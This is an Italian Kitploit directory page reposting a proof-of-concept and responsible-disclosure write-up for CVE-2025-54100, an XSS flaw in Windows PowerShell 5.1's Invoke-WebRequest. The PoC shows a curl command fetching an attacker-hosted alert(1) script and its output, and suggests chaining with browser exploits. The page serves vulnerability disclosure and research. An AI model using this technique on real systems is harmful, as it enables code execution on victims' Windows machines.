Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-54100 — Proof-of-concept per CVE-2025-54100: XSS in Invoke-WebRequest di PowerShell tramite mshtml.HTMLDocumentClass, che consente l'esecuzione di codice remoto quando si scarica JavaScript dannoso. | Kitploit
Strumenti/GitHubGitHub/osman1337-security/cve-2025-54100
Analisi delle VulnerabilitàExploitSicurezza WebCommand and ControlStrumento di Accesso Remoto
GitHubosman1337-security/cve-2025-54100

CVE-2025-54100

Proof-of-concept per CVE-2025-54100: XSS in Invoke-WebRequest di PowerShell tramite mshtml.HTMLDocumentClass, che consente l'esecuzione di codice remoto quando si scarica JavaScript dannoso.

Vedi Repository
235608 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-54100

Il curl di PowerShell utilizza Invoke-WebRequest internamente.

PS C:\Users\melih> curl

cmdlet Invoke-WebRequest at command pipeline position 1
Supply values for the following parameters:
Uri:

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.5

Osservando la documentazione del parametro UseBasicParsing,

Questo parametro è stato deprecato. A partire da PowerShell 6.0.0, tutte le richieste Web utilizzano solo il parsing di base. Questo parametro è incluso solo per compatibilità con le versioni precedenti e qualsiasi suo utilizzo non ha alcun effetto sul funzionamento del cmdlet.

Il problema risiede in UseBasicParsing del cmdlet Invoke-WebRequest di PowerShell. UseBasicParsing utilizza il parsing di base, non valuta alcun codice JavaScript. Si limita a leggere il testo e a farne il parsing.

Se questo parametro non viene fornito, Invoke-WebRequest avvia Internet Explorer internamente e tenta di analizzare il codice HTML valutandolo effettivamente, usando mshtml.HTMLDocumentClass. Effettuare una richiesta curl a un sito web che ospita codice JavaScript comporta l'esecuzione di codice nel browser del client, che nel nostro caso è il terminale di Windows.

La documentazione di mshtml.HTMLDocumentClass è disponibile qui sotto.

https://learn.microsoft.com/en-us/dotnet/api/system.windows.forms.htmldocument

Osservando il ciclo di vita dal primo documento qui sopra, possiamo vedere che,

Windows PowerShell 5.1 Aug-2016 Rilasciato con Windows 10 Anniversary Update e Windows Server 2016, WMF 5.1 PowerShell 6.0 20-Jan-2018 13-Feb-2019 Basato su .NET Core 2.0 (https://github.com/dotnet/core/blob/main/release-notes/2.0/2.0-supported-os.md)

Dopo alcune indagini abbiamo notato che le ultime versioni di Windows 11, Server 22 e 25 vengono fornite con una vecchia versione di PowerShell (la 5.1, che è quella predefinita) vulnerabile ad attacchi XSS.

Installazione pulita di Windows Server 22, alt text

PoC

L'attacco è molto semplice:

  • Ospita un sito web con un payload script.
  • Usa curl su di esso e vedrai l'esecuzione

alt text

PS C:\Users\melih> curl 172.27.223.167:8000/a.js


StatusCode        : 200
StatusDescription : OK
Content           : <script>alert(1)</script>

RawContent        : HTTP/1.0 200 OK
                    Content-Length: 26
                    Content-Type: text/javascript
                    Date: Tue, 09 Dec 2025 15:50:40 GMT
                    Last-Modified: Tue, 09 Dec 2025 15:47:18 GMT
                    Server: SimpleHTTP/0.6 Python/3.12.3

                    <script>a...
Forms             : {}
Headers           : {[Content-Length, 26], [Content-Type, text/javascript], [Date, Tue, 09 Dec
                    2025 15:50:40 GMT], [Last-Modified, Tue, 09 Dec 2025 15:47:18 GMT]...}
Images            : {}
InputFields       : {}
Links             : {}
ParsedHtml        : mshtml.HTMLDocumentClass
RawContentLength  : 26


Puoi essere creativo ed eseguire operazioni come open("about:blank").

alt text

Bisogna anche considerare che questo potrebbe essere utilizzato in catene più grandi, come exploit del browser, per ottenere un'esecuzione affidabile o forzare il rendering del browser.

Cronologia degli aggiornamenti MSRC

  • 15 Ott 2025 – La vulnerabilità è stata inviata al team di sicurezza Microsoft tramite MSRC.
  • 16 Ott 2025 – Il team ci ha informato che ha iniziato a esaminare il rapporto.
  • 17 Nov 2025 – Il team ha confermato la vulnerabilità e ci ha informato che l'avrebbe corretta. Il messaggio completo del team MSRC: “Abbiamo confermato il comportamento che hai segnalato. Continueremo le nostre indagini e determineremo come affrontare il problema. Per favore, fammi sapere se hai ulteriori informazioni che potrebbero aiutarci nelle indagini o se hai domande.”
  • 25 Novembre 2025 - Il rapporto è stato classificato come Severity: Important, Security Impact: Remote Code Execution ed è stato assegnato un bounty di $5,000.

alt text

Scarica lo strumento